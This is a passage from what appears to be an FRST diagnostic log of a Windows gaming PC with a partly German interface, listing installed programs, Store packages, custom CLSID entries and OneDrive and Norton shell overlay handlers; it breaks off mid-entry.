Easy Connection to Screen (HKLM\...\{B779166F-820A-44EE-9DAC-7F794BC8A67F}) (Version: 4.7.1 - Samsung) ENE Video Capture Box HAL (HKLM\...\{A096611D-BA11-4A1A-8D09-0A0462D7C8F2}) (Version: 1.0.5.15 - Ene Tech.) Hidden ENE Video Capture Box HAL (HKLM-x32\...\{974259bf-3ed1-4cd6-9ed1-40c7f601a786}) (Version: 1.0.5.15 - Ene Tech.) Hidden ENE_DRAM_RGB_AIO (HKLM\...\{40514BA6-1FC2-4BBD-84A2-504634A97196}) (Version: 1.0.4.16 - Ene Tech.) Hidden ENE_DRAM_RGB_AIO (HKLM-x32\...\{ca38f41e-a37c-41b2-82e3-28b215743448}) (Version: 1.0.4.16 - Ene Tech.) Hidden ENE_EHD_M2_HAL (HKLM\...\{37A48B7F-D4EA-4863-844E-A284E2AA3C5D}) (Version: 1.0.11.2 - ENE TECHNOLOGY INC.) Hidden ENE_EHD_M2_HAL (HKLM-x32\...\{7cf61546-b8ec-4a85-a301-fa8c79296bd0}) (Version: 1.0.11.2 - ENE TECHNOLOGY INC.) Hidden ENE_External_Device_HAL (HKLM\...\{2B8E611F-0B51-4FAC-87BB-AF50D82E7DDA}) (Version: 1.0.11.1 - ENE Tech) Hidden ENE_External_Device_HAL (HKLM-x32\...\{bb9d349f-b87b-4026-b336-1604708bd09c}) (Version: 1.0.11.1 - ENE Tech) Hidden ENE_MousePad_HAL (HKLM\...\{9E97178A-ADB8-4778-BE60-7E28E2A72721}) (Version: 1.0.2.0 - ENE TECHNOLOGY INC.) Hidden ENE_MousePad_HAL (HKLM-x32\...\{c2c794a4-7986-4c45-884d-d4ca43b88df9}) (Version: 1.0.2.0 - ENE TECHNOLOGY INC.) Hidden ENE_X_AIC_HAL (HKLM\...\{CF703694-01C6-4062-B797-84DB215662BC}) (Version: 1.0.6.3 - ENE TECHNOLOGY INC.) Hidden ENE_X_AIC_HAL (HKLM-x32\...\{c662a481-d76a-4188-95d2-6eb4ffd55542}) (Version: 1.0.6.3 - ENE TECHNOLOGY INC.) Hidden Epic Games Launcher (HKLM-x32\...\{5F15891E-8342-47CD-AFFF-89211CFC04D0}) (Version: 1.3.23.0 - Epic Games, Inc.) Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden Epic Online Services (HKLM-x32\...\{758842D2-1538-4008-A8E3-66F65A061C52}) (Version: 2.0.33.0 - Epic Games, Inc.) 
Futuremark SystemInfo (HKLM-x32\...\{DB3FC272-D04E-42E1-A981-20A781A9561C}) (Version: 5.69.1204.0 - Futuremark) GIMP 2.10.34-2 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\GIMP-2_is1) (Version: 2.10.34 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 127.0.6533.72 - Google LLC) iPod-Unterstützung (HKLM\...\{5530CCC4-99F6-4198-BB1B-F1F78D6BCA76}) (Version: 12.11.3.7 - Apple Inc.) Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden LIFT 3.0 (HKLM\...\{535DCAB0-B2C4-45F1-B03D-7E7A1059B74E}) (Version: 3.2.0 - C.C.Buchner) Malwarebytes version 5.1.6.117 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 5.1.6.117 - Malwarebytes) Microsoft 365 - de-de (HKLM\...\O365HomePremRetail - de-de) (Version: 16.0.15225.20204 - Microsoft Corporation) Microsoft 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.15225.20204 - Microsoft Corporation) Microsoft 365 - es-es (HKLM\...\O365HomePremRetail - es-es) (Version: 16.0.15225.20204 - Microsoft Corporation) Microsoft 365 - fr-fr (HKLM\...\O365HomePremRetail - fr-fr) (Version: 16.0.15225.20204 - Microsoft Corporation) Microsoft 365 - it-it (HKLM\...\O365HomePremRetail - it-it) (Version: 16.0.15225.20204 - Microsoft Corporation) Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 126.0.2592.113 - Microsoft Corporation) Microsoft Edge WebView2-Laufzeit (HKLM-x32\...\Microsoft EdgeWebView) (Version: 126.0.2592.113 - Microsoft Corporation) Microsoft GameInput (HKLM-x32\...\{1F2B6AF3-C260-8666-5950-E3FEDBC851D6}) (Version: 10.1.22621.3036 - Microsoft Corporation) Microsoft OneDrive (HKLM\...\OneDriveSetup.exe) (Version: 24.132.0701.0002 - Microsoft Corporation) Microsoft Update Health Tools (HKLM\...\{C6FD611E-7EFE-488C-A0E0-974C09EF6473}) (Version: 5.72.0.0 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 
9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (HKLM-x32\...\{8bdfe669-9705-4184-9368-db9ce581e0e7}) (Version: 14.36.32532.0 - Microsoft Corporation) Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (HKLM-x32\...\{410c0ee1-00bb-41b6-9772-e12c2828b02f}) (Version: 14.36.32532.0 - Microsoft 
Corporation) Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (HKLM\...\{0025DD72-A959-45B5-A0A3-7EFEB15A8050}) (Version: 14.36.32532 - Microsoft Corporation) Hidden Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (HKLM\...\{D5D19E2F-7189-42FE-8103-92CD1FA457C2}) (Version: 14.36.32532 - Microsoft Corporation) Hidden Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (HKLM-x32\...\{C2C59CAB-8766-4ABD-A8EF-1151A36C41E5}) (Version: 14.36.32532 - Microsoft Corporation) Hidden Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (HKLM-x32\...\{73F77E4E-5A17-46E5-A5FC-8A061047725F}) (Version: 14.36.32532 - Microsoft Corporation) Hidden Microsoft Visual Studio Code (User) (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.90.2 - Microsoft Corporation) Mine-imator 1.2.9 (HKLM-x32\...\{EF61A1AA-5F85-4E94-ACC6-D5650A312AE6}}_is1) (Version: 1.2.9.2 - David Norgren) MSI Afterburner 4.6.5 (HKLM-x32\...\Afterburner) (Version: 4.6.5 - MSI Co., LTD) MSI Center SDK (HKLM-x32\...\{15289038-41BE-48F8-B8B9-0B1021D3089E}}_is1) (Version: 3.2023.1127.01 - MSI) MSIRegister (HKLM-x32\...\{80B995A4-3A86-4690-98A6-563F1A788835}_is1) (Version: 2.0.0.22 - MSI) Norton 360 (HKLM-x32\...\NGC) (Version: 22.24.2.6 - NortonLifeLock Inc) NVIDIA FrameView SDK 1.3.8513.32290073 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.3.8513.32290073 - NVIDIA Corporation) NVIDIA GeForce Experience 3.27.0.120 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.27.0.120 - NVIDIA Corporation) NVIDIA Grafiktreiber 551.52 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 551.52 - NVIDIA Corporation) NVIDIA HD-Audiotreiber 1.3.40.14 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.40.14 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.21.0713 
(HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation) OBS Studio (HKLM-x32\...\OBS Studio) (Version: 29.1.3 - OBS Project) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.15225.20150 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.15225.20194 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0407-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-040C-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0410-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0C0A-0000-0000000FF1CE}) (Version: 16.0.15128.20178 - Microsoft Corporation) Hidden Opera GX Stable 109.0.5097.142 (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\Opera GX 109.0.5097.142) (Version: 109.0.5097.142 - Opera Software) Overwolf (HKLM-x32\...\Overwolf) (Version: 0.256.0.2 - Overwolf Ltd.) 
Patriot Viper M2 SSD RGB (HKLM\...\{8B4C0A3D-C135-4E1F-98D8-3926494B4D61}) (Version: 1.1.0.1 - Patriot Memory) Hidden Patriot Viper M2 SSD RGB (HKLM-x32\...\{07236f40-ec25-4646-8cb6-b6aaf1597324}) (Version: 1.1.0.1 - Patriot Memory) Hidden PowerToys (Preview) (HKLM\...\{92AE79ED-B1CD-425A-8111-64E61153C5E1}) (Version: 0.81.1 - Microsoft Corporation) Hidden PowerToys (Preview) x64 (HKLM-x32\...\{fca38025-53e3-439e-8a24-a3261efd2924}) (Version: 0.81.1 - Microsoft Corporation) Promontory_GPIO Driver (HKLM-x32\...\{B5512BCC-F4CD-4159-86A4-B2AD7D38FFA9}) (Version: 2.0.1.0 - Advanced Micro Devices, Inc.) Hidden Realtek Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.9071.1 - Realtek Semiconductor Corp.) Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.42.526.2020 - Realtek) Revo Uninstaller 2.4.5 (HKLM\...\{A28DBDA2-3CC7-4ADC-8BFE-66D7743C6C97}_is1) (Version: 2.4.5 - VS Revo Group, Ltd.) RGB Fusion (HKLM-x32\...\{FFA8F1FA-3C2C-4A94-AC0B-0DF47272C25F}) (Version: 3.22.1221.1 - Gigabyte) Shotcut (HKLM\...\Shotcut_is1) (Version: 23.09.29 - Meltytech) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) UltiMaker Cura 5.4.0 (HKLM-x32\...\UltiMaker Cura 5.4.0-5.4.0) (Version: 5.4.0 - UltiMaker) UltiMaker Cura 5.5.0 (HKLM-x32\...\UltiMaker Cura 5.5.0-5.5.0) (Version: 5.5.0 - UltiMaker) Uninstall Lunar Client (HKU\S-1-5-21-1221853621-2447620182-1933698513-1001\...\1fcec38f-e773-5444-8669-32b8eb41524b) (Version: 3.2.11 - Moonsworth LLC) Verbatim_SureFireGaming_Product (HKLM\...\{35CB65C6-A7E3-4EE7-AD40-738D70A72164}) (Version: 1.0.3.11 - Verbatim) Hidden Verbatim_SureFireGaming_Product (HKLM-x32\...\{d601832a-0d94-46ce-9b19-78e8a5887313}) (Version: 1.0.3.11 - Verbatim) Hidden VLC media player (HKLM\...\VLC media player) (Version: 3.0.20 - VideoLAN) WD P40 Game Drive (HKLM\...\{EE55DBAE-ECDD-4ADD-AAB5-23DE848B0996}) (Version: 1.0.2.18 - Western Digital Corporation) Hidden WD P40 
Game Drive (HKLM-x32\...\{72b1a866-fc31-4381-bff3-fa6cd8823777}) (Version: 1.0.2.18 - Western Digital Corporation) Hidden WD_BLACK AN1500 (HKLM\...\{085E2365-0A70-4230-B664-02D5E4FE7E9C}) (Version: 1.0.12.0 - ENE TECHNOLOGY INC.) Hidden WD_BLACK AN1500 (HKLM-x32\...\{9c94735f-73fd-4b0f-9ddb-8be7b3cc4681}) (Version: 1.0.12.0 - ENE TECHNOLOGY INC.) Hidden WD_BLACK D50 (HKLM\...\{BDE43F26-5917-44F8-B86A-F1D9A6B80B32}) (Version: 1.0.9.0 - ENE TECHNOLOGY INC.) Hidden WD_BLACK D50 (HKLM-x32\...\{a1d1ba00-92b7-4a99-8ebd-65b25c0e9e44}) (Version: 1.0.9.0 - ENE TECHNOLOGY INC.) Hidden Windows-Treiberpaket - Apple, Inc. (USBAAPL) USB (05/19/2017 6.0.9999.69) (HKLM\...\7771A0176A543725D7BBF70A546C096A4EE2DD40) (Version: 05/19/2017 6.0.9999.69 - Apple, Inc.) Windows-Treiberpaket - Apple, Inc. (USBAAPL64) USB (05/19/2017 6.0.9999.69) (HKLM\...\C2C6A29F3ABC80FD992777A92DF30699124D37C5) (Version: 05/19/2017 6.0.9999.69 - Apple, Inc.) WinRAR 6.23 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 6.23.0 - win.rar GmbH) Packages: ========= Atomic Heart -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.579645D26CFD_1.14.4.0_x64__4hny5m903y3g0 [2024-06-15] (Focus Home Interactive SA) Atomic Heart: Annihilation Instinct -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.1495F5E33141_1.0.0.0_x64__4hny5m903y3g0 [2023-10-13] (Focus Home Interactive SA) Atomic Heart: Trapped in Limbo -> C:\Program Files\WindowsApps\FocusHomeInteractiveSA.48903E5CC1186_1.0.0.0_x64__4hny5m903y3g0 [2024-04-06] (Focus Home Interactive SA) Copilot -> C:\Program Files\WindowsApps\Microsoft.Copilot_1.0.4.0_neutral__8wekyb3d8bbwe [2024-07-14] (Microsoft Corporation) Disney+ -> C:\Program Files\WindowsApps\Disney.37853FC22B2CE_2024.3.211.0_neutral__6rarf9sa4v8jt [2024-07-14] (Disney) EarTrumpet -> C:\Program Files\WindowsApps\40459File-New-Project.EarTrumpet_2.3.0.0_x86__1sdd7yawvg6ne [2024-07-14] (File-New-Project) [Startup Task] Hello Neighbor 2 -> C:\Program 
Files\WindowsApps\tinyBuildGames.HelloNeighbor2_1.3.6.0_x64__3sz1pp2ynv2xe [2024-06-15] (tinyBuild Games) High on Life -> C:\Program Files\WindowsApps\2637SquanchGamesInc.HighonLife_1.13.3652.0_x64__mh7dg3tfmz2cj [2024-06-15] (Squanch Games Inc.) Instagram -> C:\Program Files\WindowsApps\Facebook.InstagramBeta_42.0.23.0_neutral__8xx8rvfyw5nnt [2024-07-14] (Instagram) iTunes -> C:\Program Files\WindowsApps\AppleInc.iTunes_12132.3.2017.0_x64__nzyj5cx40ttqa [2024-05-22] (Apple Inc.) [Startup Task] Microsoft Family -> C:\Program Files\WindowsApps\MicrosoftCorporationII.MicrosoftFamily_0.2.40.0_x64__8wekyb3d8bbwe [2023-11-09] (Microsoft Corp.) Microsoft Whiteboard -> C:\Program Files\WindowsApps\Microsoft.Whiteboard_53.21110.548.0_x64__8wekyb3d8bbwe [2024-03-07] (Microsoft Corporation) Microsoft.BingSearch -> C:\Program Files\WindowsApps\Microsoft.BingSearch_1.0.95.0_x64__8wekyb3d8bbwe [2024-07-23] (Microsoft Corporation) MicrosoftWindows.CrossDevice -> C:\Program Files\WindowsApps\MicrosoftWindows.CrossDevice_1.24062.51.0_x64__cw5n1h2txyewy [2024-07-19] (Microsoft Windows) [Startup Task] Minecraft for Windows -> C:\Program Files\WindowsApps\Microsoft.MinecraftUWP_1.21.202.0_x64__8wekyb3d8bbwe [2024-07-09] (Microsoft Studios) Minecraft Launcher -> C:\Program Files\WindowsApps\Microsoft.4297127D64EC6_1.7.2.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios) Minecraft Legends - Windows -> C:\Program Files\WindowsApps\Microsoft.BadgerWin10_1.18.19068.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios) Minecraft: Java Edition -> C:\Program Files\WindowsApps\Microsoft.MinecraftJavaEdition_1.0.5.0_x64__8wekyb3d8bbwe [2024-06-15] (Microsoft Studios) MSI Center -> C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSICenter_2.0.38.0_x64__kzh8wxbdkxb8p [2024-06-29] (MICRO-STAR INTERNATIONAL CO., LTD) [Startup Task] MSI Game Bar -> C:\Program Files\WindowsApps\9426MICRO-STARINTERNATION.MSIGameBar_2.0.15.0_x64__kzh8wxbdkxb8p [2024-02-07] (MICRO-STAR INTERNATIONAL CO., LTD) 
Netflix -> C:\Program Files\WindowsApps\4DF9E0F8.Netflix_7.0.8.0_neutral__mcm4njqhnhss8 [2024-07-23] (Netflix, Inc.) Norton Security -> C:\Program Files\Norton Security\Engine\22.24.2.6 [2024-07-24] (NortonLifeLock Inc.) NVIDIA Control Panel -> C:\Program Files\WindowsApps\NVIDIACorp.NVIDIAControlPanel_8.1.966.0_x64__56jybvy8sckqj [2024-04-24] (NVIDIA Corp.) PowerToys FileLocksmith Context Menu -> C:\Program Files\PowerToys\WinUI3Apps [2024-06-09] (Microsoft) PowerToys ImageResizer Context Menu -> C:\Program Files\PowerToys [2024-06-09] (Microsoft) PowerToys PowerRename Context Menu -> C:\Program Files\PowerToys\WinUI3Apps [2024-06-09] (Microsoft) Python 3.11 -> C:\Program Files\WindowsApps\PythonSoftwareFoundation.Python.3.11_3.11.2544.0_x64__qbz5n2kfra8p0 [2024-04-03] (Python Software Foundation) Quizlet -> C:\Program Files\WindowsApps\QuizletInc.Quizlet_1.0.1.0_neutral__1kmnvb67sms8a [2024-07-14] (Quizlet, Inc.) Roblox -> C:\Program Files\WindowsApps\ROBLOXCORPORATION.ROBLOX_2.634.417.0_x64__55nm5eh3cm0pr [2024-07-19] (Roblox Corporation) Speech Pack - German (Germany) -> C:\Program Files\WindowsApps\MicrosoftWindows.Speech.de-DE.1_1.0.5.0_x64__cw5n1h2txyewy [2024-06-23] (Microsoft Windows) Spotify Music -> C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.242.290.0_x64__zpdnekdrzrea0 [2024-07-19] (Spotify AB) [Startup Task] Supraland: Six Inches Under -> C:\Program Files\WindowsApps\HumbleBundle.SupralandSixInchesUnder_1.0.29.0_x64__q2mcdwmzx4qja [2024-06-15] (Humble Bundle) WhatsApp -> C:\Program Files\WindowsApps\5319275A.WhatsAppDesktop_2.2428.10.0_x64__cv1g1gvanyjgm [2024-07-24] (WhatsApp Inc.) [Startup Task] WinAppRuntime.Main.1.5 -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Main.1.5_5001.178.1908.0_x64__8wekyb3d8bbwe [2024-07-10] (Microsoft Corp.) WinAppRuntime.Singleton -> C:\Program Files\WindowsApps\MicrosoftCorporationII.WinAppRuntime.Singleton_5001.178.1908.0_x64__8wekyb3d8bbwe [2024-07-10] (Microsoft Corp.) 
Windows Feature Experience Pack -> C:\Windows\SystemApps\MicrosoftWindows.Client.LKG_cw5n1h2txyewy [2024-07-12] (Microsoft Windows) Windows-Fotoanzeige -> C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2024.11070.19012.0_x64__8wekyb3d8bbwe [2024-07-23] (Microsoft Corporation) [Startup Task] WinRAR -> C:\Program Files\WinRAR [2023-09-13] (win.rar GmbH) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{10144713-1526-46C9-88DA-1FB52807A9FF}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.SvgThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{5ea9a442-5352-ed6e-d37f-9d511e7e2caa}\localserver32 -> C:\Program Files\PowerToys\PowerToys.PowerLauncher.exe (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{60789D87-9C3C-44AF-B18C-3DE2C2820ED3}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.MarkdownPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{729B72CD-B72E-4FE9-BCBF-E954B33FE699}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.QoiPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{77257004-6F25-4521-B602-50ECC6EC62A6}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.StlThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{A0257634-8812-4CE8-AF11-FA69ACAEAFAE}\InprocServer32 -> C:\Program 
Files\PowerToys\PowerToys.GcodePreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{AD856B15-D25E-4008-AFB7-AFAA55586188}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.QoiThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{C4F0910E-E0B4-4E68-8086-452730C7A26A}\InprocServer32 -> C:\Users\skysc\AppData\Local\Autodesk\webdeploy\production\dabca83aceed67f5b8555a5b9697a3fc08792c77\NPreview10.dll (Autodesk, Inc. -> ) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{D8034CFA-F34B-41FE-AD45-62FCBB52A6DA}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.MonacoPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{F2847CBE-CD03-4C83-A359-1A8052C1B9D5}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.GcodeThumbnailProviderCpp.dll (Microsoft Corporation -> Microsoft Corporation) CustomCLSID: HKU\S-1-5-21-1221853621-2447620182-1933698513-1001_Classes\CLSID\{FCDD4EED-41AA-492F-8A84-31A1546226E0}\InprocServer32 -> C:\Program Files\PowerToys\PowerToys.SvgPreviewHandlerCpp.dll (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft 
Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) 
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => C:\Program Files\Microsoft OneDrive\24.132.0701.0002\FileSyncShell64.dll [2024-07-20] (Microsoft Corporation -> Microsoft Corporation) ShellIconOverlayIdentifiers-x32: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files\Norton Security\Engine\22.24.2.6\buShell.dll [2024-03-04] (NortonLifeLock Inc. -> Gen Digital Inc.) ShellIconOverlayIdentifiers-x32: [ OverlayPending] -> 